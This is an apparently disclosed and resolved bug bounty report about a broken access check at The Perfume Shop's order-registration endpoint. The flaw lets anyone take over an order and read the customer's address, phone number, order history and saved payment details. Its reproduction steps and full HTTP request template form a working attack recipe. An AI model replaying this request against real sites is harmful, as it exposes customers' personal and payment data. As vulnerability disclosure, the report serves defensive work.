PII Disclosure At `theperfumeshop.com/register/forOrder`
Critical
Vulnerability Details
## Summary:
Hello there! I found a way to accesing any user's PII (full address, phone number, full name, ** all orders**, payment details [if the victim already saved before] ) who created a order in The Perfume Shop.
This is happening via https://theperfumeshop.com/register/forOrder endpoint. I realized this endpoint after the guest checkout process was completed.
## Steps To Reproduce:
1. Open https://theperfumeshop.com website on your browser ( do not login to any account ).
2. Go to a product and add to your basket then, get your CSRF token and cookies.
3. Find a order ID who you want to attack. You can try with my order ID: `664448593`
4. Repeat this request on Burp Suite after replacing with the CSRF token, cookies, an email that not registered before and the order ID of the victim:
```http
POST /register/forOrder HTTP/2
Host: www.theperfumeshop.com
Cookie: █████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: █████checkout/orderConfirmationByReferenceId/PROD_00000000000
Content-Type: application/x-www-form-urlencoded
Origin: https://www.theperfumeshop.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
orderCode=[order-id-of-victim]&email=[put-here-random-email]&associateCard=yes&termsCheck=1&dateOfBirth.day=██████████&dateOfBirth.month=█████████&dateOfBirth.year=███&pwd=███&checkPwd=██████&CSRFToken=[csrf-token-here]
```
You'll see `Location: ███████serverError` on response, this meant attack succesfully completed.
5. Go to ████████login page and login with the random email that you put in the request and this password -> `████`.
6. After succesfully logged into the account, check addressses, orders and personal information.
Here's a proof of concept:
██████
Also, I set this report severity to Critical because CVSS calculator's response and comment of @lesswood in the #1542373:
> ███████
So, since I can easily harvest PII (full address, phone number, full name, ** all orders**, payment details [if the victim already saved before] ) and take over a system (can delete orders from victim's own account) without any privileges.
## Impact
Accesing any user's PII (full address, phone number, full name, ** all orders**, payment details [if the victim already saved before] ) who created a order in The Perfume Shop.
Actions
View on HackerOneReport Stats
- Report ID: 1618100
- State: Closed
- Substate: resolved
- Upvotes: 113